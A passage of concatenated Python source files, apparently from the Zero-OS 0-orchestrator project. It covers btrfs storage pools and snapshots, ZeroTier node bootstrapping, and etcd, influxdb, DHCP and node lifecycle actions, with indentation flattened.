fs = self.info
if fs:
for device in fs['devices']:
total += device['size']
return total
@property
def uuid(self):
fs = self.info
if fs:
return fs['uuid']
return None
@property
def used(self):
total = 0
fs = self.info
if fs:
for device in fs['devices']:
total += device['used']
return total
@property
def ays(self):
if self._ays is None:
from zeroos.orchestrator.sal.atyourservice.StoragePool import StoragePoolAys
self._ays = StoragePoolAys(self)
return self._ays
def __repr__(self):
return "StoragePool <{}>".format(self.name)
class FileSystem:
def __init__(self, name, pool):
self.name = name
self.pool = pool
self.subvolume = "filesystems/{}".format(name)
self.path = os.path.join(self.pool.mountpoint, self.subvolume)
self.snapshotspath = os.path.join(self.pool.mountpoint, 'snapshots', self.name)
self._ays = None
@property
def client(self):
return self.pool.node.client
def delete(self, includesnapshots=True):
"""
Delete filesystem
"""
paths = [fs['Path'] for fs in self.client.btrfs.subvol_list(self.path)]
paths.sort(reverse=True)
for path in paths:
rpath = os.path.join(self.path, os.path.relpath(path, self.subvolume))
self.client.btrfs.subvol_delete(rpath)
self.client.btrfs.subvol_delete(self.path)
if includesnapshots:
for snapshot in self.list():
snapshot.delete()
self.client.filesystem.remove(self.snapshotspath)
def get(self, name):
"""
Get snapshot
"""
for snap in self.list():
if snap.name == name:
return snap
raise ValueError("Could not find snapshot {}".format(name))
def list(self):
"""
List snapshots
"""
snapshots = []
if self.client.filesystem.exists(self.snapshotspath):
for fileentry in self.client.filesystem.list(self.snapshotspath):
if fileentry['is_dir']:
snapshots.append(Snapshot(fileentry['name'], self))
return snapshots
def exists(self, name):
"""
Check if a snapshot exists
"""
return name in self.list()
def create(self, name):
"""
Create snapshot
"""
logger.debug("create snapshot %s on %s", name, self.pool)
snapshot = Snapshot(name, self)
if self.exists(name):
raise RuntimeError("Snapshot path {} exists.")
self.client.filesystem.mkdir(self.snapshotspath)
self.client.btrfs.subvol_snapshot(self.path, snapshot.path)
return snapshot
@property
def ays(self):
if self._ays is None:
from JumpScale.sal.g8os.atyourservice.StoragePool import FileSystemAys
self._ays = FileSystemAys(self)
return self._ays
def __repr__(self):
return "FileSystem <{}: {!r}>".format(self.name, self.pool)
class Snapshot:
def __init__(self, name, filesystem):
self.filesystem = filesystem
self.name = name
self.path = os.path.join(self.filesystem.snapshotspath, name)
self.subvolume = "snapshots/{}/{}".format(self.filesystem.name, name)
@property
def client(self):
return self.filesystem.pool.node.client
def rollback(self):
self.filesystem.delete(False)
self.client.btrfs.subvol_snapshot(self.path, self.filesystem.path)
def delete(self):
self.client.btrfs.subvol_delete(self.path)
def __repr__(self):
return "Snapshot <{}: {!r}>".format(self.name, self.filesystem)
```
#### File: 0-orchestrator/scripts/resourcepoolinfo.py
```python
from zeroos.orchestrator import client
import prettytable
def main(url):
api = client.APIClient(url)
table = prettytable.PrettyTable(["Node", "VMS", "Containers"])
for node in api.nodes.ListNodes().json():
runningcontainers = 0
totalcontainers = 0
runningvms = 0
totalvms = 0
for container in api.nodes.ListContainers(node['id']).json():
if container['status'] == 'running':
runningcontainers += 1
totalcontainers += 1
for vm in api.nodes.ListVMs(node['id']).json():
if vm['status'] == 'running':
runningvms += 1
totalvms += 1
table.add_row([node['hostname'], "{}/{}".format(runningvms, totalvms), "{}/{}".format(runningcontainers, totalcontainers)])
print(table.get_string(sortby='Node'))
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', help='URL of 0 rest api')
options = parser.parse_args()
main(options.url)
```
#### File: templates/bootstrap.zero-os/actions.py
```python
from js9 import j
def input(job):
for required in['zerotierNetID', 'zerotierToken']:
if not job.model.args.get(required):
raise j.exceptions.Input("{} cannot be empty".format(required))
return job.model.args
def bootstrap(job):
from zerotier import client
service = job.service
token = service.model.data.zerotierToken
netid = service.model.data.zerotierNetID
zerotier = client.Client()
zerotier.set_auth_header('bearer {}'.format(token))
resp = zerotier.network.listMembers(netid)
members = resp.json()
job.logger.info("Received %s members" % len(members))
# First make sure all members that need to be authorzed anyway, are authorized
to_process = list()
for member in members:
if member['nodeId'] in service.model.data.authorizedZerotierMembers:
if not member['config']['authorized']:
job.logger.info("Authorizing %s" % member['nodeId'])
member['config']['authorized'] = True
zerotier.network.updateMember(member, member['nodeId'], netid)
else:
to_process.append(member)
# In a second pass process all the others
for member in to_process:
try:
try_authorize(job, job.logger, netid, member, zerotier)
except Exception as err:
job.logger.error(str(err))
member['config']['authorized'] = False
zerotier.network.updateMember(member, member['nodeId'], netid)
def delete_node(job):
"""
this method will be called from the node.zero-os to remove the node from zerotier
"""
from zerotier import client
node = job.service.aysrepo.serviceGet(role='node', instance=job.model.args['node_name'])
service = job.service
token = service.model.data.zerotierToken
netid = service.model.data.zerotierNetID
zerotier = client.Client()
zerotier.set_auth_header('bearer {}'.format(token))
resp = zerotier.network.listMembers(netid)
members = resp.json()
for member in members:
if node.model.data.redisAddr in member['config']['ipAssignments']:
try:
zerotier.network.deleteMember(member['nodeId'], netid)
except Exception as err:
job.logger.error(str(err))
break
def try_authorize(job, logger, netid, member, zerotier):
import time
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
job.context['token'] = get_jwt_token(service.aysrepo)
if not member['online'] or member['config']['authorized']:
job.logger.info("Skipping member %s: online=%s, authorized=%s" % (member['nodeId'], member['online'], member['config']['authorized']))
return
# authorized new member
logger.info("authorize new member {}".format(member['nodeId']))
member['config']['authorized'] = True
zerotier.network.updateMember(member, member['nodeId'], netid)
# get assigned ip of this member
resp = zerotier.network.getMember(member['nodeId'], netid)
member = resp.json()
for _ in range(20):
if len(member['config']['ipAssignments']):
break
time.sleep(1)
resp = zerotier.network.getMember(member['nodeId'], netid)
member = resp.json()
else:
raise RuntimeError('Node %s did not get an ip assigned' % (member['nodeId']))
zerotier_ip = member['config']['ipAssignments'][0]
# test if we can connect to the new member
node = Node(zerotier_ip, password=get_jwt_token(service.aysrepo))
node.client.testConnectionAttempts = 0
node.client.timeout = 30
for attempt in range(5):
try:
logger.info("connection to g8os with IP: {}".format(zerotier_ip))
node.client.ping()
break
except:
continue
else:
raise RuntimeError("can't connect, unauthorize member IP: {}".format(zerotier_ip))
# connection succeeded, set the hostname of the node to zerotier member
member['name'] = node.name
member['description'] = node.client.info.os().get('hostname', '')
zerotier.network.updateMember(member, member['nodeId'], netid)
# create node.zero-os service
name = node.name
try:
nodeservice = service.aysrepo.serviceGet(role='node', instance=name)
logger.info("service for node {} already exists, updating model".format(name))
# mac sure the service has the correct ip in his model.
# it could happend that a node get a new ip after a reboot
nodeservice.model.data.redisAddr = zerotier_ip
nodeservice.model.data.status = 'running'
# after reboot we also wonna call install
nodeservice.executeAction('install', context=job.context)
except j.exceptions.NotFound:
# do hardwarechecks
for prod in service.producers.get('hardwarecheck', []):
prod.executeAction('check', args={'ipaddr': zerotier_ip,
'node_id': member['nodeId'],
'jwt': get_jwt_token(service.aysrepo)})
# create and install the node.zero-os service
if service.model.data.wipedisks:
node.wipedisks()
node_actor = service.aysrepo.actorGet('node.zero-os')
networks = [n.name for n in service.producers.get('network', [])]
hostname = node.client.info.os()['hostname']
if hostname == 'zero-os':
hostname = 'zero-os-%s' % name
node_args = {
'id': name,
'status': 'running',
'networks': networks,
'hostname': hostname,
'redisAddr': zerotier_ip,
}
logger.info("create node.zero-os service {}".format(name))
nodeservice = node_actor.serviceCreate(instance=name, args=node_args)
try:
logger.info("install node.zero-os service {}".format(name))
nodeservice.executeAction('install', context=job.context)
except:
nodeservice.delete()
raise
# do ERP registrations
for prod in service.producers.get('erp_registration', []):
prod.executeAction('register', args={'node_id': name, 'zerotier_address': member['nodeId']})
def processChange(job):
service = job.service
args = job.model.args
category = args.pop('changeCategory')
if category == "dataschema":
ztID = job.model.args.get('zerotierNetID')
if ztID:
service.model.data.zerotierNetID = ztID
token = job.model.args.get('zerotierToken')
if token:
service.model.data.zerotierToken = token
def monitor(job):
pass
```
#### File: templates/dhcp/actions.py
```python
from js9 import j
def start(job):
gateway = job.service.parent.consumers['gateway'][0]
gwdata = gateway.model.data.to_dict()
apply_config(job, gwdata)
def apply_config(job, gwdata=None):
import ipaddress
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.gateway.dhcp import DHCP
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
job.context['token'] = get_jwt_token(job.service.aysrepo)
container = Container.from_ays(job.service.parent, job.context['token'], logger=job.service.logger)
gwdata = {} if gwdata is None else gwdata
nics = gwdata.get('nics', [])
dhcpservers = []
for nic in nics:
dhcpserver = nic.get('dhcpserver')
if not dhcpserver:
continue
cidr = ipaddress.IPv4Interface(nic['config']['cidr'])
dhcpserver['subnet'] = str(cidr.network.network_address)
dhcpserver['gateway'] = str(cidr.ip)
dhcpserver['interface'] = nic['name']
dhcpservers.append(dhcpserver)
dhcp = DHCP(container, gwdata['domain'], dhcpservers)
dhcp.stop()
service.model.data.status = 'halted'
service.saveAll()
dhcp.apply_config()
service.model.data.status = 'running'
service.saveAll()
def update(job):
apply_config(job, job.model.args)
def watchdog_handler(job):
import asyncio
loop = j.atyourservice.server.loop
gateway = job.service.parent.consumers['gateway'][0]
if gateway.model.data.status == 'running':
asyncio.ensure_future(job.service.asyncExecuteAction('start', context=job.context), loop=loop)
```
#### File: templates/etcd_cluster/actions.py
```python
from js9 import j
def input(job):
if job.model.args.get('etcds', []) != []:
raise j.exceptions.Input("etcds should not be set as input")
nodes = job.model.args.get('nodes', [])
if not nodes:
raise j.exceptions.Input("Invalid amount of nodes provided")
def init(job):
configure(job)
def ensureStoragepool(job, node):
"""
param: job ,, currently executing job object
param: node ,, node object from the zeroos.orchestrator.sal library
"""
from zeroos.orchestrator.sal.StoragePool import StoragePools
from zeroos.orchestrator.utils import find_disks
service = job.service
# prefer nvme if not then ssd if not then just use the cache what ever it may be
free_disks = find_disks('nvme', [node], 'sp_etcd_')
if not free_disks[node.name]:
free_disks = find_disks('ssd', [node], 'sp_etcd_')
if not free_disks[node.name]:
return "{}_fscache".format(node.name)
# choose the first choice in the results since create takes a list we choose the first item and create a list with it.
devices = [free_disks[node.name][0].devicename]
storagePool = StoragePools(node).create('etcd_%s' % service.name, devices, 'single', 'single')
storagePool.mount()
storagePoolService = storagePool.ays.create(service.aysrepo)
return storagePoolService.name
def configure(job):
import random
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
from zeroos.orchestrator.configuration import get_configuration
service = job.service
job.context['token'] = get_jwt_token(job.service.aysrepo)
config = get_configuration(service.aysrepo)
nodes = set()
for node_service in service.producers['node']:
nodes.add(Node.from_ays(node_service, job.context['token']))
nodes = list(nodes)
if len(nodes) % 2 == 0:
nodes = random.sample(nodes, len(nodes) - 1)
etcd_actor = service.aysrepo.actorGet("etcd")
container_actor = service.aysrepo.actorGet("container")
fsactor = service.aysrepo.actorGet("filesystem")
etcd_args = {}
peers = []
etcds = []
flist = config.get('etcd-flist', 'https://hub.gig.tech/gig-official-apps/etcd-release-3.2.flist')
for node in nodes:
baseports, tcpservices = get_baseports(job, node, baseport=2379, nrports=2)
containername = '{}_{}_{}_{}'.format(service.name, 'etcd', node.name, baseports[1])
args = {
'storagePool': ensureStoragepool(job, node),
'name': containername,
}
old_filesystem_service = service.aysrepo.servicesFind(name=containername, role='filesystem')
if old_filesystem_service:
node.client.filesystem.remove('/mnt/storagepools/%s/filesystems/%s/member' % (args['storagePool'], containername))
fsactor.serviceCreate(instance=containername, args=args)
# create container
data_dir = '/mnt/data'
args = {
'node': node.name,
'flist': flist,
'mounts': [{'filesystem': containername, 'target': data_dir}],
'hostNetworking': True,
}
container_actor.serviceCreate(instance=containername, args=args)
server_bind = '{}:{}'.format(node.storageAddr, baseports[1])
client_bind = '{}:{}'.format(node.storageAddr, baseports[0])
mgmt_client_bind = '{}:{}'.format(node.addr, baseports[0])
etcd_args[node.name] = {
"serverBind": server_bind,
"clientBind": client_bind,
"container": containername,
"mgmtClientBind": mgmt_client_bind,
"tcps": tcpservices,
"homeDir": data_dir,
}
etcdID = "{}_{}_{}".format(service.name, node.name, baseports[1])
if service.aysrepo.servicesFind(name=etcdID, role='etcd'):
etcdID = "%s_recovered" % etcdID
peers.append("{}=http://{}".format(etcdID, server_bind))
for k, v in etcd_args.items():
tcps = v.pop("tcps")
etcdname = "{}_{}_{}".format(service.name, k, tcps[1].model.data.port)
if service.aysrepo.servicesFind(name=etcdname, role='etcd'):
etcdname = "%s_recovered" % etcdname
v["peers"] = peers
etcd_service = etcd_actor.serviceCreate(instance=etcdname, args=v)
etcd_service.consume(tcps[0])
etcd_service.consume(tcps[1])
etcds.append(etcd_service.name)
service.consume(etcd_service)
service.model.data.etcds = etcds
def install(job):
service = job.service
service.model.data.status = "running"
service.saveAll()
def get_baseports(job, node, baseport, nrports):
service = job.service
tcps = service.aysrepo.servicesFind(role='tcp', parent='node.zero-os!%s' % node.name)
usedports = set()
for tcp in tcps:
usedports.add(tcp.model.data.port)
freeports = []
tcpactor = service.aysrepo.actorGet("tcp")
tcpservices = []
while True:
if baseport not in usedports:
baseport = node.freeports(baseport=baseport, nrports=1)[0]
args = {
'node': node.name,
'port': baseport,
}
tcp = 'tcp_{}_{}'.format(node.name, baseport)
tcpservices.append(tcpactor.serviceCreate(instance=tcp, args=args))
freeports.append(baseport)
if len(freeports) >= nrports:
return freeports, tcpservices
baseport += 1
def check_container_etcd_status(job, etcd):
'''
checks status of both container and etcd , since we cannot check status of etcd without the container being running
param job,, job called on the watchdog_handler action
param etcd,, container etcd
'''
try:
container = etcd.parent
container_client, container_status = check_container_status(job, container)
if container_status:
container_client.client.job.list("etcd.{}".format(etcd.name))
return True, True
return False, False
except RuntimeError as e:
return True, False
def check_container_status(job, container):
'''
checks status of the container and avoids throwing errors if node is down
param job,, job called on the watchdog_handler action
param container,, container service
'''
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
try:
container_client = Container.from_ays(container,
password=job.context['token'],
logger=job.service.logger,
timeout=5)
if container_client.id:
# if returns empty means the container is down
return container_client, True
return None, False
except ConnectionError as e:
# to catch exception if node is down
return None, False
def watchdog_handler(job):
'''
This action is called upon from either a container or etcd watchdog handler which are called from node service's
watchdog. This self heals the etcd cluster if etcd fails will redeploy, if container fails will redeploy and if the
cluster goes into disaster where the number of etcd dead > (n-1)/2 then the action will redeploy the cluster on the
nodes availabe on the enviroment and resave the configurations in the storage clusters and the vdisks .
'''
import asyncio
async def selfhealing(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
import redis
# needs refactoring : for refacotr the disabled services will be detected by the service's own watchdog handler
# so here can focus on only the recovery
service = job.service
if service.model.data.status == 'recovering':
return
if not service.aysrepo.servicesFind(role='node'):
return
service.model.data.status = 'recovering'
etcds = set(service.producers.get('etcd', []))
working_etcds = set()
dead_nodes = set()
dead_etcds_working_containers = set()
working_model_nodes = set()
token = get_jwt_token(job.service.aysrepo)
job.context['token'] = token
service.saveAll()
# check on etcd container since the watch dog will handle the actual service
for etcd in etcds:
container_status, etcd_status = check_container_etcd_status(job, etcd)
if not etcd_status and container_status:
dead_etcds_working_containers.add(etcd)
if etcd_status:
working_etcds.add(etcd)
dead_etcds_containers = etcds-working_etcds
for etcd in dead_etcds_containers:
container = etcd.parent
node = container.parent
try:
node_client = Node.from_ays(node, password=<PASSWORD>, timeout=20)
ping = node_client.client.ping()
working_model_nodes.add(node)
except (redis.TimeoutError, ConnectionError) as e:
ping = None
dead_nodes.add(node.name)
# check if less than disaster threshold do normal respawn of single etcd or container and etcd
if len(working_etcds) > (len(etcds)-1)/2:
# respawn dead etcd only
for etcd in dead_etcds_working_containers:
await etcd.asyncExecuteAction('start', context=job.context)
service.model.data.status = 'running'
service.saveAll()
service.logger.info("etcd %s respwaned" % etcd.name)
return
# respawn dead containers
if not ping:
raise j.exceptions.RunTimeError("node %s with Etcd %s is down" % (node.name, etcd.name))
await container.asyncExecuteAction('start', context=job.context)
service.model.data.status = 'running'
await etcd.asyncExecuteAction('start', context=job.context)
service.saveAll()
service.logger.info("etcd %s and container %s respawned" % (etcd.name, container.name))
return
# stop all remaining containers from the old cluster
try:
for etcd in working_etcds:
await etcd.asyncExecuteAction('stop', context=job.context)
await etcd.parent.asyncExecuteAction('stop', context=job.context)
# clean all reaminag tcps on old running nodes
for etcd in service.producers['etcd']:
for tcp in etcd.producers['tcp']:
try:
Node.from_ays(etcd.parent.parent, password=<PASSWORD>, timeout=5)
await tcp.asyncExecuteAction('drop', context=job.context)
except ConnectionError:
continue
await tcp.asyncExecuteAction('delete', context=job.context)
# check if nodes are more than the min number for cluster deployment which is 3.
tmp = list()
for node in [service for service in service.aysrepo.servicesFind(role='node')]:
if node.model.data.status == 'running':
tmp.append(node.name)
all_nodes = set(tmp)
if len(working_model_nodes) > 1:
service.model.data.nodes = [node.name for node in working_model_nodes]
else:
service.model.data.nodes = list(all_nodes - dead_nodes)
# remove old nodes and etcds from producers (has tobe here)
for etcd_service in service.producers['etcd']:
service.model.producerRemove(etcd_service)
service.saveAll()
for node_service in service.producers['node']:
if node_service.name not in service.model.data.nodes:
service.model.producerRemove(node_service)
service.saveAll()
# consume new nodes.
node_services = [service.aysrepo.serviceGet(instance=node, role='node')for node in service.model.data.nodes]
for node_service in node_services:
service.consume(node_service)
service.model.data.etcds = []
service.saveAll()
await service.asyncExecuteAction('configure', context=job.context)
# install all services created by the configure of the etcd_cluster
etcd_services = [service.aysrepo.serviceGet(instance=i, role='etcd') for i in service.model.data.etcds]
for etcd in etcd_services:
for mount in etcd.parent.model.data.mounts:
fs = service.aysrepo.serviceGet('filesystem', mount.filesystem)
await fs.asyncExecuteAction('install', context=job.context)
for tcp in etcd.producers['tcp']:
await tcp.asyncExecuteAction('install', context=job.context)
await etcd.parent.asyncExecuteAction('install', context=job.context)
await etcd.asyncExecuteAction('install', context=job.context)
# save all vdisks to new etcd cluster
vdisks = service.aysrepo.servicesFind(role='vdisk')
for vdisk in vdisks:
vdisk.asyncExecuteAction('save_config', context=job.context)
# save all storage cluster to new etcd cluster
storagecluster_block_services = service.aysrepo.servicesFind(role='storagecluster.block')
for storagecluster_block_service in storagecluster_block_services:
await storagecluster_block_service.asyncExecuteAction('save_config', context=job.context)
storagecluster_object_services = service.aysrepo.servicesFind(role='storagecluster.object')
for storagecluster_object_service in storagecluster_object_services:
await storagecluster_object_service.asyncExecuteAction('save_config', context=job.context)
# restart all runnning vms
vmachines = service.aysrepo.servicesFind(role='vm')
for vmachine in vmachines:
if vmachine.model.data.status == 'running':
await vmachine.asyncExecuteAction('start', context=job.context)
finally:
service.model.data.status = 'running'
service.saveAll()
for etcd_service in service.aysrepo.servicesFind(role='etcd'):
if etcd_service.model.data.status != 'running':
container_status, etcd_status = check_container_etcd_status(job, etcd_service.parent)
if not etcd_status:
await etcd_service.parent.asyncExecuteAction('delete', context=job.context)
service.logger.info("etcd_cluster %s respawned" % service.name)
loop = job.service._loop
asyncio.ensure_future(selfhealing(job), loop=loop)
```
#### File: templates/influxdb/actions.py
```python
def get_container(service, force=True):
containers = service.producers.get('container')
if not containers:
if force:
raise RuntimeError('Service didn\'t consume any containers')
else:
return
return containers[0]
def init(job):
from zeroos.orchestrator.configuration import get_configuration
service = job.service
container_actor = service.aysrepo.actorGet('container')
config = get_configuration(service.aysrepo)
args = {
'node': service.model.data.node,
'flist': config.get(
'influxdb-flist', 'https://hub.gig.tech/gig-official-apps/influxdb.flist'),
'hostNetworking': True
}
cont_service = container_actor.serviceCreate(instance='{}_influxdb'.format(service.name), args=args)
service.consume(cont_service)
def install(job):
start(job)
def start(job):
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.influxdb.influxdb import InfluxDB
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
service.model.data.status = 'running'
container = get_container(service)
container.executeAction('start', context=job.context)
container_ays = Container.from_ays(container, job.context['token'], logger=service.logger)
influx = InfluxDB(
container_ays, service.parent.model.data.redisAddr, service.model.data.port,
service.model.data.rpcport)
influx.start()
influx.create_databases(service.model.data.databases)
service.saveAll()
def stop(job):
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.influxdb.influxdb import InfluxDB
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
service.model.data.status = 'halted'
container = get_container(service)
container_ays = Container.from_ays(container, job.context['token'], logger=service.logger)
if container_ays.is_running():
influx = InfluxDB(
container_ays, service.parent.model.data.redisAddr, service.model.data.port,
service.model.data.rpcport)
influx.stop()
container.executeAction('stop', context=job.context)
service.model.data.status = 'halted'
service.saveAll()
def uninstall(job):
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
container = get_container(service, False)
if container:
stop()
container.delete()
service.delete()
def processChange(job):
from zeroos.orchestrator.sal.Container import Container
from zeroos.orchestrator.sal.influxdb.influxdb import InfluxDB
from zeroos.orchestrator.configuration import get_jwt_token_from_job
service = job.service
args = job.model.args
if args.pop('changeCategory') != 'dataschema' or service.model.actionsState['install'] in ['new', 'scheduled']:
return
container_service = get_container(service)
container = Container.from_ays(container_service, get_jwt_token_from_job(job), logger=service.logger)
influx = InfluxDB(
container, service.parent.model.data.redisAddr, service.model.data.port,
service.model.data.rpcport)
if 'port' in args:
service.model.data.port = args['port']
if container.is_running() and influx.is_running()[0]:
influx.stop()
influx.port = args['port']
influx.start()
if args.get('databases'):
if container.is_running() and influx.is_running()[0]:
create_dbs = set(args['databases']) - set(service.model.data.databases)
drop_dbs = set(service.model.data.databases) - set(args['databases'])
influx.create_databases(create_dbs)
influx.drop_databases(drop_dbs)
service.model.data.databases = args['databases']
service.saveAll()
def monitor(job):
pass
def init_actions_(service, args):
return {
'init': [],
'install': ['init'],
'monitor': ['start'],
'delete': ['uninstall'],
'uninstall': [],
}
```
#### File: templates/node.zero-os/actions.py
```python
from js9 import j
def get_stats_collector(service):
stats_collectors_services = service.consumers.get('stats_collector')
if stats_collectors_services:
return stats_collectors_services[0]
def get_statsdb(service):
statsdb_services = service.aysrepo.servicesFind(role='statsdb')
if statsdb_services:
return statsdb_services[0]
def get_version(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
if service.model.data.status != 'running':
version = ''
else:
node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))
pong = node.client.ping()
version = pong.split('Version: ')[1] if pong else ''
service.model.data.version = version
service.saveAll()
return version
def input(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_configuration, get_jwt_token
args = job.model.args
ip = args.get('redisAddr')
node = Node(ip, args.get('redisPort'), get_jwt_token(job.service.aysrepo))
config = get_configuration(job.service.aysrepo)
version = node.client.info.version()
core0_version = config.get('0-core-version')
core0_revision = config.get('0-core-revision')
if (core0_version and core0_version != version['branch']) or \
(core0_revision and core0_revision != version['revision']):
raise RuntimeError(
'Node with IP {} has a wrong version. Found version {}@{} and expected version {}@{} '.format(
ip, version['branch'], version['revision'], core0_version, core0_revision))
def init(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
service = job.service
node = Node.from_ays(service, get_jwt_token(service.aysrepo))
job.logger.info('create storage pool for fuse cache')
poolname = '{}_fscache'.format(service.name)
storagepool = node.ensure_persistance(poolname)
storagepool.ays.create(service.aysrepo)
statsdb_service = get_statsdb(service)
if statsdb_service:
stats_collector_actor = service.aysrepo.actorGet('stats_collector')
args = {
'node': service.name,
'port': statsdb_service.model.data.port,
'ip': statsdb_service.parent.model.data.redisAddr,
}
stats_collector_service = stats_collector_actor.serviceCreate(instance=service.name, args=args)
stats_collector_service.consume(service)
def getAddresses(job):
service = job.service
networks = service.producers.get('network', [])
networkmap = {}
for network in networks:
networkmap[network.name] = network.executeAction('getAddresses', args={'node_name': service.name})
return networkmap
def install(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
# at each boot recreate the complete state in the system
service = job.service
node = Node.from_ays(service, get_jwt_token(job.service.aysrepo))
get_version(job)
job.logger.info('mount storage pool for fuse cache')
poolname = '{}_fscache'.format(service.name)
node.ensure_persistance(poolname)
# Set host name
node.client.system('hostname %s' % service.model.data.hostname).get()
node.client.bash('echo %s > /etc/hostname' % service.model.data.hostname).get()
job.logger.info('configure networks')
for network in service.producers.get('network', []):
network.executeAction('configure', args={'node_name': service.name})
stats_collector_service = get_stats_collector(service)
statsdb_service = get_statsdb(service)
if stats_collector_service and statsdb_service and statsdb_service.model.data.status == 'running':
stats_collector_service.executeAction('install', context=job.context)
node.client.bash('modprobe ipmi_si && modprobe ipmi_devintf').get()
def monitor(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.sal.healthcheck import HealthCheckObject
from zeroos.orchestrator.configuration import get_jwt_token, get_configuration
service = job.service
config = get_configuration(service.aysrepo)
token = get_jwt_token(job.service.aysrepo)
job.context['token'] = token
install_action = service.model.actionsState['install']
if install_action != 'ok' and install_action != 'error':
return
healthcheck_service = job.service.aysrepo.serviceGet(role='healthcheck',
instance='node_%s' % service.name,
die=False)
if healthcheck_service is None:
healthcheck_actor = service.aysrepo.actorGet('healthcheck')
healthcheck_service = healthcheck_actor.serviceCreate(instance='node_%s' % service.name)
service.consume(healthcheck_service)
nodestatus = HealthCheckObject('nodestatus', 'Node Status', 'Node Status', '/nodes/{}'.format(service.name))
node = Node.from_ays(service, token, timeout=5)
state = node.is_running()
if state:
service.model.data.status = 'running'
configured = node.is_configured(service.name)
if not configured:
service.executeAction('install', context=job.context)
for consumer in service.getConsumersRecursive():
consumer.self_heal_action('monitor')
stats_collector_service = get_stats_collector(service)
statsdb_service = get_statsdb(service)
# Check if statsdb is installed on this node and start it if needed
if (statsdb_service and str(statsdb_service.parent) == str(job.service)
and statsdb_service.model.data.status != 'running'):
statsdb_service.executeAction('start', context=job.context)
# Check if there is a running statsdb and if so make sure stats_collector for this node is started
if (stats_collector_service and stats_collector_service.model.data.status != 'running'
and statsdb_service.model.data.status == 'running'):
stats_collector_service.executeAction('start', context=job.context)
# healthchecks
nodestatus.add_message('node', 'OK', 'Node is running')
update_healthcheck(job, healthcheck_service, node.healthcheck.openfiledescriptors())
update_healthcheck(job, healthcheck_service, node.healthcheck.cpu_mem())
update_healthcheck(job, healthcheck_service, node.healthcheck.rotate_logs())
update_healthcheck(job, healthcheck_service, node.healthcheck.network_bond())
update_healthcheck(job, healthcheck_service, node.healthcheck.interrupts())
update_healthcheck(job, healthcheck_service, node.healthcheck.context_switch())
update_healthcheck(job, healthcheck_service, node.healthcheck.threads())
update_healthcheck(job, healthcheck_service, node.healthcheck.qemu_vm_logs())
update_healthcheck(job, healthcheck_service, node.healthcheck.network_load())
update_healthcheck(job, healthcheck_service, node.healthcheck.disk_usage())
update_healthcheck(job, healthcheck_service, node.healthcheck.ssh_cleanup(job=job))
flist = config.get('healthcheck-flist', 'https://hub.gig.tech/gig-official-apps/healthcheck.flist')
with node.healthcheck.with_container(flist) as cont:
update_healthcheck(job, healthcheck_service, node.healthcheck.node_temperature(cont))
update_healthcheck(job, healthcheck_service, node.healthcheck.powersupply(cont))
update_healthcheck(job, healthcheck_service, node.healthcheck.fan(cont))
# check network stability of node with the rest of the nodes ! TODO
else:
if service.model.data.status != 'rebooting':
service.model.data.status = 'halted'
nodestatus.add_message('node', 'ERROR', 'Node is halted')
update_healthcheck(job, healthcheck_service, nodestatus.to_dict())
get_version(job)
service.saveAll()
def update_healthcheck(job, health_service, healthchecks):
import time
service = job.service
interval = service.model.actionGet('monitor').period
new_healthchecks = list()
if not isinstance(healthchecks, list):
healthchecks = [healthchecks]
defaultresource = '/nodes/{}'.format(service.name)
for health_check in healthchecks:
for health in health_service.model.data.healthchecks:
# If this healthcheck already exists, update its attributes
if health.id == health_check['id']:
health.name = health_check.get('name', '')
health.resource = health_check.get('resource', defaultresource) or defaultresource
health.messages = health_check.get('messages', [])
health.category = health_check.get('category', '')
health.lasttime = time.time()
health.interval = interval
health.stacktrace = health_check.get('stacktrace', '')
break
else:
# healthcheck doesn't exist in the current list, add it to the list of new
health_check['lasttime'] = time.time()
health_check['interval'] = interval
new_healthchecks.append(health_check)
old_healthchecks = health_service.model.data.to_dict().get('healthchecks', [])
old_healthchecks.extend(new_healthchecks)
health_service.model.data.healthchecks = old_healthchecks
def reboot(job):
import time
import redis
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.configuration import get_jwt_token
token = get_jwt_token(job.service.aysrepo)
job.context['token'] = token
service = job.service
service._recurring_tasks['monitor'].stop()
try:
start = time.time()
# Make sure any running monitor action finishes before we reboot
while time.time() < start + 60:
if not j.core.jobcontroller.db.jobs.list(
actor='node.zero-os', action='monitor', state='running', service=service.name):
break
time.sleep(1)
else:
raise j.exceptions.RuntimeError('Failed to reboot node. Waiting for monitoring action for too long')
force_reboot = service.model.data.forceReboot
vms = service.consumers.get('vm') or []
for vm in vms:
if vm.model.data.status != 'halted':
if not force_reboot:
raise j.exceptions.RuntimeError(
'Failed to reboot node. Force reboot is not enabled and some vms are not halted')
else:
vm.executeAction('shutdown', context=job.context)
service.model.data.status = 'rebooting'
job.logger.info('reboot node {}'.format(service))
node = Node.from_ays(service, job.context['token'])
node.client.raw('core.reboot', {})
finally:
start = time.time()
while time.time() < start + 10:
try:
node = Node.from_ays(service, token, timeout=5)
node.client.testConnectionAttempts = 0
node.client.ping()
except (RuntimeError, ConnectionError, redis.TimeoutError, TimeoutError):
